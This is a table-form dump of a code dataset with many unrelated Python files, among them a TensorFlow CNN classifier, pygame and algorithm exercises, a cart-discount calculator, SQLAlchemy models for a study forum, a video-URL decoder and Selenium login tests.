text
stringlengths 8
6.05M
|
|---|
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 4 20:17:16 2020
@author: han
"""
import tensorflow as tf
import numpy as np
import os
import skimage
import keras
from sklearn.utils import shuffle
import matplotlib.pyplot as plt
def load_small_data(dir_path,m,flag):
images_m=[] ##新建一个空列表用于存放图片数集
labels_m=[] ##新建一个空列表用于存放标签数集
images_show=[]
lab_show=[]
lab=os.listdir(dir_path)
n=0
for l in lab:
if(n>=m):
break
img=os.listdir(dir_path+l) ##img为对应路径下的文件夹
if flag==True:
images_show.append(skimage.data.imread(dir_path+l+'/'+img[0]))
lab_show.append(l)
for i in img:
img_path=dir_path+l+'/'+i ##是的话获取图片路径
labels_m.append(int(n)) ##将图片的上层文件夹转换为int类型存于labels中
images_m.append(skimage.data.imread(img_path)) ##读取对应路径图像存放于images_m中
n+=1
if flag==True:
return images_m,labels_m,images_show,lab_show ## m类标签以及数据
else:
return images_m,labels_m
def display_no5_img(no5_imgs,labels_no5):
plt.figure(figsize=(15,15)) ##显示的尺寸为15*15
for i in range(len(no5_imgs)):
plt.subplot(5,1,(i+1)) ##显示为11行,每行7个
plt.title("%s" %(labels_no5[i])) ##显示标题
plt.imshow(no5_imgs[i]) ##显示图片
plt.axis('off') ##不显示坐标轴
plt.show()
##预处理数据函数(数组化,乱序)
def prepare_data(images,labels,n_classes):
##images64=cut_image(images,64,64) ##裁剪图片大小为64*64
train_x=np.array(images)
train_y=np.array(labels)
##images_gray=color.rgb2gray(images_a) ##转灰度
indx=np.arange(0,train_y.shape[0]) #生成列表0到图片大小的数量
indx=shuffle(indx) #shuffle() 方法将序列的所有元素随机排序。
train_x=train_x[indx]
train_y=train_y[indx] #生成乱序训练集
train_y=keras.utils.to_categorical(train_y,n_classes) ##one-hot独热编码
# print(train_y)
# print(np.shape(train_y))
return train_x,train_y
def class_label(list_num, test_x):
label = []
lab=os.listdir("./Test")
for i in np.arange(5):
label.append(lab[list_num[i]])
display_no5_img(test_x[0:5], label)
## 定义卷积层的生成函数
def conv2d(x,W,b,stride=1):
x=tf.nn.conv2d(x,W,strides=[1,stride,stride,1],padding="SAME")
x=tf.nn.bias_add(x,b)
return tf.nn.relu(x)
## 定义池化层的生成函数
def maxpool2d(x,stride=2):
return tf.nn.max_pool(x,ksize=[1,stride,stride,1],strides=[1,stride,stride,1],padding="SAME")
## 定义卷积神经网络生成函数
def conv_net(x,Weights,bias,dropout,fla):
## Convolutional layer 1(卷积层1)
conv1 = conv2d(x,Weights['con1_w'],bias['conv1_b']) ##100*100*64
conv1 = maxpool2d(conv1,2) ##经过池化层1 shape:50*50*64
## Convolutional layer 2(卷积层2)
conv2 = conv2d(conv1,Weights['con2_w'],bias['conv2_b']) ##50*50*128
conv2 = maxpool2d(conv2,2) ##经过池化层2 shape:25*25*128
## Fully connected layer 1(全连接层1)
flatten = tf.reshape(conv2,[-1,fla]) ##Flatten层,扁平化处理
fc1 = tf.add(tf.matmul(flatten,Weights['fc_w1']),bias['fc_b1'])
fc1 = tf.nn.relu(fc1) ##经过relu激活函数
# print(flatten.get_shape())
## Fully connected layer 2(全连接层2)
fc2 = tf.add(tf.matmul(fc1,Weights['fc_w2']),bias['fc_b2']) ##计算公式:输出参数=输入参数*权值+偏置
fc2 = tf.nn.relu(fc2) ##经过relu激活函数
## Dropout(Dropout层防止预测数据过拟合)
fc2 = tf.nn.dropout(fc2,dropout)
## Output class prediction
prediction = tf.add(tf.matmul(fc2,Weights['out']),bias['out']) ##输出预测参数
return prediction
def CNN_init():
images_test_20,labels_test_20=load_small_data('./Test/',10,False)
test_x,test_y=prepare_data(images_test_20,labels_test_20,10)
n_classes=10 ##数据的类别数
kernel_h=kernel_w=5 ##卷积核尺寸
depth_in=3 ##图片的通道数
depth_out1=64 ##第一层卷积的卷积核个数
depth_out2=128 ##第二层卷积的卷积核个数image_size=train_x.shape[1] ##图片尺寸
image_size=test_x.shape[1]
fla=int((image_size*image_size/16)*depth_out2) ##用于扁平化处理的参数经过两层卷积池化后的图像大小*第二层的卷积核个数
ckpt_file_path = "./CNNData/save_net.ckpt"
tf.reset_default_graph()
Weights={"con1_w":tf.Variable(tf.random_normal([kernel_h,kernel_w,depth_in,depth_out1]), name = "con1_w"),
"con2_w":tf.Variable(tf.random_normal([kernel_h,kernel_w,depth_out1,depth_out2]), name = "con2_w"),
"fc_w1":tf.Variable(tf.random_normal([int((image_size*image_size/16)*depth_out2),1024]), name = "fc_w1"),
"fc_w2":tf.Variable(tf.random_normal([1024,512]), name = "fc_w2"),
"out":tf.Variable(tf.random_normal([512,n_classes]), name = "out1")}
##定义各卷积层和全连接层的偏置变量
bias={"conv1_b":tf.Variable(tf.random_normal([depth_out1]), name = "conv1_b"),
"conv2_b":tf.Variable(tf.random_normal([depth_out2]), name = "conv2_b"),
"fc_b1":tf.Variable(tf.random_normal([1024]), name = "fc_b1"),
"fc_b2":tf.Variable(tf.random_normal([512]), name = "fc_b2"),
"out":tf.Variable(tf.random_normal([n_classes]), name = "out2")}
saver = tf.train.Saver()
sess = tf.Session()
saver.restore(sess, ckpt_file_path)
sess.run(Weights)
sess.run(bias)
x=tf.placeholder(tf.float32,[None,100,100,3])
keep_prob=tf.placeholder(tf.float32) ##dropout的placeholder(解决过拟合)
prediction=conv_net(x,Weights,bias,keep_prob,fla) ##生成卷积神经网络
dict_data = {'x':x,'keep_prob':keep_prob,'prediction':prediction, \
'Weights':Weights, 'bias':bias, "n_classes":n_classes}
return dict_data,sess
def run_CNN(x,keep_prob,prediction,img,sess):
test_feed={x:img,keep_prob: 0.8}
y1 = sess.run(prediction,feed_dict=test_feed)
test_classes = np.argmax(y1,1)
lab=os.listdir("./Test")
return lab[test_classes[0]]
def text_Accuracy(x,keep_prob,prediction,sess,n_classes):
y=tf.placeholder(tf.float32,[None,n_classes]) ##feed到神经网络的标签数据的类型和shape
images_test_20,labels_test_20=load_small_data('./Test/',n_classes,False)
test_x,test_y=prepare_data(images_test_20,labels_test_20,n_classes)
## 评估模型
correct_pred=tf.equal(tf.argmax(prediction,1),tf.argmax(y,1))
accuracy=tf.reduce_mean(tf.cast(correct_pred,tf.float32))
test_x=test_x[0:400]
test_y=test_y[0:400]
test_feed={x:test_x,y:test_y,keep_prob: 0.8}
# y1 = sess.run(prediction,feed_dict=test_feed)
# test_classes = np.argmax(y1,1)
# class_label(test_classes, test_x)
data = sess.run(accuracy,feed_dict=test_feed)
print('Testing Accuracy:',data)
return data
def batch_process(x,keep_prob,prediction,sess,img_set):
img_set = np.array(img_set)
test_feed={x:img_set,keep_prob: 0.8}
y1 = sess.run(prediction,feed_dict=test_feed)
test_classes = np.argmax(y1,1)
lab=np.array(os.listdir("./Test"))
return lab[test_classes]
if __name__ == '__main__':
dict_data,sess= CNN_init()
x1 = dict_data['x']
keep_prob = dict_data['keep_prob']
prediction = dict_data['prediction']
n_classes = dict_data['n_classes']
text_Accuracy(x1,keep_prob,prediction,sess,n_classes)
|
import pygame
import sys
from pygame.locals import *
pygame.init()
DISPLAYSURF = pygame.display.set_mode((400, 300), 0, 32)
pygame.display.set_caption("Drawing stuff")
#Palette of colors
BLACK = ( 0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
GREEN = ( 0, 255, 0)
BLUE = ( 0, 0, 255)
PURPLE= (160, 32, 240)
RANDOM= (210, 254, 17)
DISPLAYSURF.fill(BLACK)
pygame.draw.rect(DISPLAYSURF, PURPLE, (100, 150, 200 , 300))
pygame.draw.rect(DISPLAYSURF, BLUE, (150, 200, 50, 100))
pygame.draw.polygon(DISPLAYSURF, GREEN, ((200, 400), (200, 300), (200, 400))
pygame.draw.rect(DISPLAYSURF, WHITE, (200, 50, 100, 150))
while True:
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
pygame.display.update()
|
# TODO: complete in free time
def binary(_list, _element):
found = False
start_index = 1
end_index = len(_list) - 1
while 1:
center_index = (end_index - start_index)/2
element_from_center = int(_list[center_index])
if _element == element_from_center: # has center
found = True
break
elif _element > element_from_center:
end_index = center_index
else: # _element < center
start_index = center_index
if center_index < start_index or center_index > end_index or center_index < 0:
break
if _list[0] == _element:
found = True
return found
list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 12, 15, 33, 88, 95, 123, 456, 789]
number = 33
print(binary(list, number))
|
""" Add directory to path, tests should import from this file. """
import os
import sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from the_exif_mutalator import cli, logging_config, tem # pylint: disable=wrong-import-position,unused-import
|
#!/usr/bin/env python
from collections import namedtuple
# Application data model
LineItem = namedtuple('LineItem', ['product_id', 'quantity'])
Order = namedtuple('Order', ['line_items', 'discount_code'])
Discount = namedtuple('Discount', ['code', 'percentage', 'type', 'product_ids'])
Product = namedtuple('Product', ['name', 'price_cents'])
Application = namedtuple('CartApplication', ['products', 'discounts'])
# Internal class for cart calculations
ItemPrice = namedtuple('ItemPrice', ['lineitem', 'product', 'price'])
def get_product(application, product_id):
""" Return the Product instance for a product id. """
return application.products[product_id]
def get_discount(application, discount_code):
""" Return the Discount instance for a code. """
if discount_code:
discount = [
d
for d in application.discounts.values()
if d.code == discount_code
]
return discount[0]
def format_price_dollars_cents(price):
""" Format a price as dollars with 2 decimals. """
return "${:.2f}".format(price)
def format_originalprice(itemprice):
""" Format the original price if discount applied. """
originalprice = itemprice.product.price_cents * itemprice.lineitem.quantity
if originalprice != itemprice.price:
return "(Original Price ${:.2f})".format(originalprice)
else:
return ""
def format_itemprice(itemprice, discount_code):
""" Format the display of an ItemPrice. """
if not discount_code:
return "{} copy of \"{}\" for ${:.2f}".format(
itemprice.lineitem.quantity,
itemprice.product.name,
itemprice.price
)
else:
# We use right aligned format strings for price and original price to get formatting done right
return "{:>6} {:>23} for {} copy of \"{}\"".format(
format_price_dollars_cents(itemprice.price),
format_originalprice(itemprice),
itemprice.lineitem.quantity,
itemprice.product.name
)
def apply_product_discount(lineitem, discount, price):
""" Apply the discount for a product if applicable. """
if lineitem.product_id in discount.product_ids:
# Round to cents
return round(price * (1.0 - (discount.percentage / 100)), 2)
else:
return price
def apply_discount(discount, itemprices):
""" Apply discount for all applicable products. """
if discount and discount.type == 'all':
# TODO: Currently handled separately from product-specific discounts but the two could be consolidated
return [
ItemPrice(lineitem=p.lineitem,
product=p.product,
# Round to cents per item even though full order is discounted
price=round(p.price * (1.0 - (discount.percentage / 100)), 2))
for p in itemprices
]
elif discount and discount.type == 'product_list':
return [
ItemPrice(lineitem=p.lineitem,
product=p.product,
price=apply_product_discount(p.lineitem, discount, p.price))
for p in itemprices
]
else:
# No discounts applied
return itemprices
def display_cart(application, order):
""" Process items in an order and output formatted string of cart. """
itemprices = [
ItemPrice(lineitem=lineitem,
product=get_product(application, lineitem.product_id),
price=get_product(application, lineitem.product_id).price_cents * lineitem.quantity)
for lineitem in order.line_items
if lineitem.product_id in application.products
]
discount = get_discount(application, order.discount_code)
itemprices = apply_discount(discount, itemprices)
display_prices = [format_itemprice(i, order.discount_code) for i in itemprices]
total_price = sum([x.price for x in itemprices])
return """Your cart:
{}
---
Total ${:.2f}""".format(
'\n'.join(display_prices),
total_price
)
|
# -*- coding: utf8 -*-
# from app import bcrypt, db
from app import db
from sqlalchemy.ext.hybrid import hybrid_property
from sqlalchemy import *
from sqlalchemy.dialects import mysql
class NewsBasic(db.Model):
__tablename__ = 'news_basic'
__table_args__ = {'schema': 'study'}
id = db.Column('id', mysql.INTEGER(display_width=11, unsigned=True), primary_key=True, nullable=False)
articleId = db.Column('articleId', mysql.INTEGER(display_width=11), nullable=False, default='0')
articleType = db.Column('articleType', VARCHAR(length=32), nullable=False, default='')
provinceId = db.Column('provinceId', VARCHAR(length=32), nullable=False, default='')
# provinceId = db.Column('provinceId', db.ForeignKey('province.province_id'))
majorId = db.Column('majorId', VARCHAR(length=32), nullable=False, default='')
instruction = db.Column('instruction', VARCHAR(length=256), nullable=False, default='')
attachUrl = db.Column('attachUrl', VARCHAR(length=256), nullable=False, default='')
thumbNum = db.Column('thumbNum', mysql.INTEGER(display_width=11), nullable=False, default='0')
transmitNum = db.Column('transmitNum', mysql.INTEGER(display_width=11), nullable=False, default='0')
commentNum = db.Column('commentNum', mysql.INTEGER(display_width=11), nullable=False, default='0')
createdTime = db.Column('createdTime', TIMESTAMP(), nullable=False, default=func.current_timestamp())
expiredAt = db.Column('expiredAt', TIMESTAMP(), nullable=False, default=func.current_timestamp())
briefText = db.Column('briefText', VARCHAR(length=256), nullable=False, default='')
panelUrl = db.Column('panelUrl', VARCHAR(length=256), nullable=False, default='')
handPicked = db.Column('handPicked', mysql.INTEGER(display_width=11), nullable=False, default='0')
class NewsComment(db.Model):
__tablename__ = 'news_comment'
__table_args__ = {'schema': 'study'}
id = db.Column('id', mysql.INTEGER(display_width=11, unsigned=True), primary_key=True, nullable=False)
articleId = db.Column('articleId', mysql.INTEGER(display_width=11), nullable=False, default='0')
uid = db.Column('uid', VARCHAR(collation=u'utf8mb4_bin', length=32), nullable=False, default='')
content = db.Column('content', VARCHAR(collation=u'utf8mb4_bin', length=1024), nullable=False, default='')
commentTime = db.Column('commentTime', TIMESTAMP(), nullable=False, default=func.current_timestamp())
parentId = db.Column('parentId', mysql.INTEGER(display_width=11), nullable=False, default='0')
class NewsDetail(db.Model):
__tablename__ = 'news_detail'
__table_args__ = {'schema': 'study'}
id = db.Column('id', mysql.INTEGER(display_width=11, unsigned=True), primary_key=True, nullable=False)
author = db.Column('author', VARCHAR(length=32), nullable=False, default='')
content = db.Column('content', TEXT())
class NewsFavorites(db.Model):
__tablename__ = 'news_favorites'
__table_args__ = {'schema': 'study'}
id = db.Column('id', mysql.INTEGER(display_width=11, unsigned=True), primary_key=True, nullable=False)
uid = db.Column('uid', VARCHAR(length=32), nullable=False, default='')
articleId = db.Column('articleId', mysql.INTEGER(display_width=11), nullable=False, default='0')
collectTime = db.Column('collectTime', TIMESTAMP(), nullable=False, default=func.current_timestamp())
class NewsThumb(db.Model):
__tablename__ = 'news_thumb'
__table_args__ = {'schema': 'study'}
id = db.Column('id', mysql.INTEGER(display_width=11, unsigned=True), primary_key=True, nullable=False)
uid = db.Column('uid', VARCHAR(length=32), nullable=False, default='')
articleId = db.Column('articleId', mysql.INTEGER(display_width=11), nullable=False, default='0')
thumbTime = db.Column('thumbTime', TIMESTAMP(), nullable=False, default=func.current_timestamp())
class Province(db.Model):
__tablename__ = 'province'
__table_args__ = {'schema': 'study'}
province_id = db.Column('province_id', VARCHAR(length=20), primary_key=True, nullable=False)
province_name = db.Column('province_name', VARCHAR(length=50), nullable=False)
# news_basics = db.relationship('NewsBasic', backref='province', lazy='dynamic')
class Major(db.Model):
__tablename__ = 'major'
__table_args__ = {'schema': 'study'}
province_name = db.Column('province_name', VARCHAR(length=20), nullable=False, primary_key=True)
major_name = db.Column('major_name', VARCHAR(length=50), nullable=False)
major_id = db.Column('major_id', VARCHAR(length=20), nullable=False, primary_key=True)
major_stage = db.Column('major_stage', VARCHAR(length=20), nullable=False, default='')
major_university = db.Column('major_university', VARCHAR(length=50), nullable=False, default='')
subject_seq = db.Column('subject_seq', VARCHAR(length=20), nullable=False)
subject_name = db.Column('subject_name', VARCHAR(length=50), nullable=False)
subject_id = db.Column('subject_id', VARCHAR(length=20), primary_key=True)
exam_mode = db.Column('exam_mode', VARCHAR(length=20))
exam_type = db.Column('exam_type', VARCHAR(length=100))
subject_property = db.Column('subject_property', VARCHAR(length=20))
exam_month = db.Column('exam_month', VARCHAR(length=20))
book_name = db.Column('book_name', VARCHAR(length=50))
book_author = db.Column('book_author', VARCHAR(length=50))
book_publisher = db.Column('book_publisher', VARCHAR(length=50))
book_version = db.Column('book_version', VARCHAR(length=50))
book_channel = db.Column('book_channel', VARCHAR(length=50))
book_id = db.Column('book_id', VARCHAR(length=50))
remark = db.Column('remark', TEXT())
wenli_flag = db.Column('wenli_flag', VARCHAR(length=20))
class Account(db.Model):
__tablename__ = 'account'
__table_args__ = {'schema': 'study'}
uid = db.Column('uid', VARCHAR(collation=u'utf8mb4_bin', length=128), primary_key=True, nullable=False, default='')
nickname = db.Column('nickname', VARCHAR(collation=u'utf8mb4_bin', length=32), nullable=False, default='')
passWord = db.Column('passWord', VARCHAR(collation=u'utf8mb4_bin', length=128), nullable=False, default='')
phone = db.Column('phone', VARCHAR(collation=u'utf8mb4_bin', length=32), nullable=False, default='')
profileUrl = db.Column('profileUrl', VARCHAR(collation=u'utf8mb4_bin', length=256), nullable=False, default='')
registerTime = db.Column('registerTime', TIMESTAMP(), nullable=False, default=func.current_timestamp())
accountType = db.Column('accountType', VARCHAR(collation=u'utf8mb4_bin', length=32), nullable=False, default='')
gender = db.Column('gender', VARCHAR(collation=u'utf8mb4_bin', length=32), nullable=False, default='DEFAULT')
registerChannel = db.Column('registerChannel', VARCHAR(collation=u'utf8mb4_bin', length=110))
qqToken = db.Column('qqToken', VARCHAR(collation=u'utf8mb4_bin', length=128), nullable=False, default='')
weixinToken = db.Column('weixinToken', VARCHAR(collation=u'utf8mb4_bin', length=128), nullable=False, default='')
weiboToken = db.Column('weiboToken', VARCHAR(collation=u'utf8mb4_bin', length=128), nullable=False, default='')
imei = db.Column('imei', VARCHAR(collation=u'utf8mb4_bin', length=128))
majorId = db.Column('majorId', VARCHAR(collation=u'utf8mb4_bin', length=20))
class Collects(db.Model):
__bind_key__ = 'bbs'
__tablename__ = 'collects'
__table_args__ = {'schema': 'bbs'}
topic_id = db.Column('topic_id', mysql.INTEGER(display_width=11), primary_key=True, nullable=False)
user_id = db.Column('user_id', VARCHAR(collation=u'utf8mb4_unicode_ci', length=50), primary_key=True, nullable=False)
status = db.Column('status', mysql.TINYINT(display_width=4), nullable=False)
update_time = db.Column('update_time', mysql.BIGINT(display_width=20), nullable=False)
class Comments(db.Model):
__bind_key__ = 'bbs'
__tablename__ = 'comments'
__table_args__ = {'schema': 'bbs'}
comment_id = db.Column('comment_id', mysql.INTEGER(display_width=11), primary_key=True, nullable=False)
content = db.Column('content', mysql.MEDIUMTEXT(collation=u'utf8mb4_unicode_ci'))
pub_time = db.Column('pub_time', mysql.BIGINT(display_width=20), nullable=False)
pub_area = db.Column('pub_area', VARCHAR(collation=u'utf8mb4_unicode_ci', length=50))
pub_client = db.Column('pub_client', VARCHAR(collation=u'utf8mb4_unicode_ci', length=20))
images = db.Column('images', mysql.MEDIUMTEXT(collation=u'utf8mb4_unicode_ci'))
status = db.Column('status', mysql.TINYINT(display_width=4), nullable=False)
topic_id = db.Column('topic_id', mysql.INTEGER(display_width=11), nullable=False)
forum_id = db.Column('forum_id', mysql.INTEGER(display_width=11), nullable=False)
user_id = db.Column('user_id', VARCHAR(collation=u'utf8mb4_unicode_ci', length=50), nullable=False)
user_name = db.Column('user_name', VARCHAR(collation=u'utf8mb4_unicode_ci', length=50), nullable=False)
reply_id = db.Column('reply_id', mysql.INTEGER(display_width=11))
reply_floor_no = db.Column('reply_floor_no', mysql.INTEGER(display_width=11))
reply_user_id = db.Column('reply_user_id', VARCHAR(collation=u'utf8mb4_unicode_ci', length=50))
reply_user_name = db.Column('reply_user_name', VARCHAR(collation=u'utf8mb4_unicode_ci', length=50))
reply_content = db.Column('reply_content', mysql.MEDIUMTEXT(collation=u'utf8mb4_unicode_ci'))
class Follows(db.Model):
__bind_key__ = 'bbs'
__tablename__ = 'follows'
__table_args__ = {'schema': 'bbs'}
forum_id = db.Column('forum_id', mysql.INTEGER(display_width=11), primary_key=True, nullable=False)
user_id = db.Column('user_id', VARCHAR(length=50), primary_key=True, nullable=False)
status = db.Column('status', mysql.TINYINT(display_width=4), nullable=False)
update_time = db.Column('update_time', mysql.BIGINT(display_width=20), nullable=False)
class Forums(db.Model):
__bind_key__ = 'bbs'
__tablename__ = 'forums'
__table_args__ = {'schema': 'bbs'}
forum_id = db.Column('forum_id', mysql.INTEGER(display_width=11), primary_key=True, nullable=False)
name = db.Column('name', VARCHAR(collation=u'utf8mb4_unicode_ci', length=100), nullable=False)
description = db.Column('description', VARCHAR(collation=u'utf8mb4_unicode_ci', length=500), nullable=False)
image = db.Column('image', mysql.MEDIUMTEXT(collation=u'utf8mb4_unicode_ci'))
province_id = db.Column('province_id', VARCHAR(collation=u'utf8mb4_unicode_ci', length=20))
major_id = db.Column('major_id', VARCHAR(collation=u'utf8mb4_unicode_ci', length=20))
last_modify_time = db.Column('last_modify_time', mysql.BIGINT(display_width=20), nullable=False)
class Praises(db.Model):
__bind_key__ = 'bbs'
__tablename__ = 'praises'
__table_args__ = {'schema': 'bbs'}
topic_id = db.Column('topic_id', mysql.INTEGER(display_width=11), primary_key=True, nullable=False)
user_id = db.Column('user_id', VARCHAR(collation=u'utf8mb4_unicode_ci', length=50), primary_key=True, nullable=False)
status = db.Column('status', mysql.TINYINT(display_width=4), nullable=False)
update_time = db.Column('update_time', mysql.BIGINT(display_width=20), nullable=False)
class Topics(db.Model):
__bind_key__ = 'bbs'
__tablename__ = 'topics'
__table_args__ = {'schema': 'bbs'}
topic_id = db.Column('topic_id', mysql.INTEGER(display_width=11), primary_key=True, nullable=False)
title = db.Column('title', VARCHAR(collation=u'utf8mb4_unicode_ci', length=100), nullable=False)
content = db.Column('content', mysql.MEDIUMTEXT(collation=u'utf8mb4_unicode_ci'))
pub_time = db.Column('pub_time', mysql.BIGINT(display_width=20), nullable=False)
pub_area = db.Column('pub_area', VARCHAR(collation=u'utf8mb4_unicode_ci', length=50))
pub_client = db.Column('pub_client', VARCHAR(collation=u'utf8mb4_unicode_ci', length=20))
images = db.Column('images', mysql.MEDIUMTEXT(collation=u'utf8mb4_unicode_ci'))
status = db.Column('status', mysql.TINYINT(display_width=4), nullable=False) #2置顶,1普通,0删除
topic_level = db.Column('topic_level', mysql.TINYINT(display_width=4), nullable=False) #1精华帖,0普通帖
user_id = db.Column('user_id', VARCHAR(collation=u'utf8mb4_unicode_ci', length=50), nullable=False)
forum_id = db.Column('forum_id', mysql.INTEGER(display_width=11), nullable=False)
last_modify_time = db.Column('last_modify_time', mysql.BIGINT(display_width=20), nullable=False)
class Views(db.Model):
__bind_key__ = 'bbs'
__tablename__ = 'views'
__table_args__ = {'schema': 'bbs'}
topic_id = db.Column('topic_id', mysql.INTEGER(display_width=11), primary_key=True, nullable=False)
user_id = db.Column('user_id', VARCHAR(collation=u'utf8mb4_unicode_ci', length=50), primary_key=True, nullable=False)
view_num = db.Column('view_num', mysql.INTEGER(display_width=11), nullable=False)
update_time = db.Column('update_time', mysql.BIGINT(display_width=20), nullable=False)
|
def binarySearch(A,B,n):
low,high = 0,n
while(low < high):
mid = low + (high-low+1)//2
flag = 1
for index in range(mid):
if(A[index] > B[n+index-mid]):
flag = 0
if(flag == 0):
high = mid - 1
else:
low = mid
return low
test = int(input())
for _ in range(test):
n = int(input())
a = list(map(int,input().split()))
num = 1
b = []
for em in a:
if(em == num):
num += 1
continue
else:
for i in range(num,em):
b.append(i)
num = em + 1
for i in range(num,2*n+1):
b.append(i)
index1 = binarySearch(a,b,n)
index2 = n - binarySearch(b,a,n)
print(max(0,index1 - index2 + 1))
|
# -*- coding: utf-8 -*-
# Resolves move url from most of hosting websites
import re, sys
class Streamango():
def decode(self, encoded, code):
#from https://github.com/jsergio123/script.module.urlresolver - kodi vstream
_0x59b81a = ""
k = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
k = k[::-1]
count = 0
for index in range(0, len(encoded) - 1):
while count <= len(encoded) - 1:
_0x4a2f3a = k.index(encoded[count])
count += 1
_0x29d5bf = k.index(encoded[count])
count += 1
_0x3b6833 = k.index(encoded[count])
count += 1
_0x426d70 = k.index(encoded[count])
count += 1
_0x2e4782 = ((_0x4a2f3a << 2) | (_0x29d5bf >> 4))
_0x2c0540 = (((_0x29d5bf & 15) << 4) | (_0x3b6833 >> 2))
_0x5a46ef = ((_0x3b6833 & 3) << 6) | _0x426d70
_0x2e4782 = _0x2e4782 ^ code
_0x59b81a = str(_0x59b81a) + chr(_0x2e4782)
if _0x3b6833 != 64:
_0x59b81a = str(_0x59b81a) + chr(_0x2c0540)
if _0x3b6833 != 64:
_0x59b81a = str(_0x59b81a) + chr(_0x5a46ef)
return _0x59b81a
def getMediaUrl(self, sourceCode):
#sourceCode = self.net.http_GET(self.url, headers=self.headers).content.decode('unicode_escape')
videoUrl = ''
resultado = re.search('''srces\.push\({type:"video/mp4",src:\w+\('([^']+)',(\d+)''', sourceCode)
if resultado:
source = self.decode(resultado.group(1), int(resultado.group(2)))
if source:
source = "http:%s" % source if source.startswith("//") else source
source = source.split("/")
if not source[-1].isdigit():
source[-1] = re.sub('[^\d]', '', source[-1])
videoUrl = "/".join(source)
return videoUrl
|
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) Qotto, 2019
""" Contains all partitioner errors
"""
__all__ = [
'BadKeyType',
'OutsideInstanceNumber'
]
class BadKeyType(TypeError):
"""BadKeyType
This error was raised in KeyPartitioner when key was not bytes
"""
class OutsideInstanceNumber(SystemError):
"""OutsideInstanceNumber
This error was raised in StateFulSetPartitioner when instance number is out of range
"""
|
def a():
return 1
def b():
x=a()
print(x)
b()
|
from common.run_method import RunMethod
import allure
@allure.step("极运营/营销中心/商品中心/新建编辑商品")
def goods_course_saveGoods_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极运营/营销中心/商品中心/新建编辑商品"
url = f"/service-gos/goods/course/saveGoods"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极运营/营销中心/商品中心/面授课程商品列表")
def goods_course_goodsList_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极运营/营销中心/商品中心/面授课程商品列表"
url = f"/service-gos/goods/course/goodsList"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极运营/营销中心/商品中心/商品详情")
def goods_course_goodsDetail_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极运营/营销中心/商品中心/商品详情"
url = f"/service-gos/goods/course/goodsDetail"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极运营/营销中心/商品中心/停用启用商品")
def goods_course_updateGoodsStatus_patch(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极运营/营销中心/商品中心/停用启用商品"
url = f"/service-gos/goods/course/updateGoodsStatus"
res = RunMethod.run_request("PATCH", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极运营/营销中心/商品中心/删除商品")
def goods_course_deleteGoods_delete(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极运营/营销中心/商品中心/删除商品"
url = f"/service-gos/goods/course/deleteGoods"
res = RunMethod.run_request("DELETE", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
|
import pytest
from pageObjects.LoginPage import LoginPage
from utilities.readProperties import ReadConfig
from utilities.customLogger import CustomLogger
class TestLogin001:
baseURL = ReadConfig.getURL()
username = ReadConfig.getUname()
password = ReadConfig.getPass()
logger = CustomLogger.customerlogger()
@pytest.mark.smoke
@pytest.mark.sanity
def test_welcome_page(self, setup):
self.logger.info("****** TestLogin001_test_welcome_page Started ******")
self.logger.info("****** Importing setup ******")
self.driver = setup
self.driver.get(self.baseURL)
title = self.driver.title
self.logger.info("****** Verifying title ******")
if title == "Swag Labs":
self.logger.info("****** Success ******")
self.driver.close()
assert True
else:
self.logger.error("****** Failed ******")
self.driver.save_screenshot(".\\Screenshots\\" + "test_loginTitle.png")
self.driver.close()
assert False
self.logger.info("****** TestLogin001_test_welcome_page Completed ******")
@pytest.mark.smoke
@pytest.mark.sanity
def test_login(self, setup):
self.logger.info("****** TestLogin001_test_login Started ******")
self.logger.info("****** Importing setup ******")
self.driver = setup
self.driver.get(self.baseURL)
self.login = LoginPage(self.driver)
self.login.setUserName(self.username)
self.login.setPassWord(self.password)
self.login.clickLogin()
self.logger.info("****** Performing login ******")
title = self.driver.title
self.logger.info("****** Verifying title ******")
if title == "Swag Labs":
self.logger.info("****** Success ******")
self.driver.close()
assert True
else:
self.logger.error("****** Failed ******")
self.driver.save_screenshot(".\\Screenshots\\" + "test_login.png")
self.driver.close()
assert False
self.logger.info("****** TestLogin001_test_login Completed ******")
|
# coding: utf-8
import os, io, sys, tarfile, zipfile
import numpy as np
from PIL import Image
"""
Compression file should be the following architecture.
Compression file
|-- Label A
| |-- image file
| |-- image file
|-- Label B
| |-- image file
| |-- image file
"""
extentions = ["jpg", "JPG", "png", "PNG"]
def load_zip_file(path, resize):
"""
This function can load the compression format, '.zip'.
"""
if type(resize) is not tuple or len(resize) != 2:
print("Parameter 'resize' should be tuple and the length should be two.")
return
dict = {}
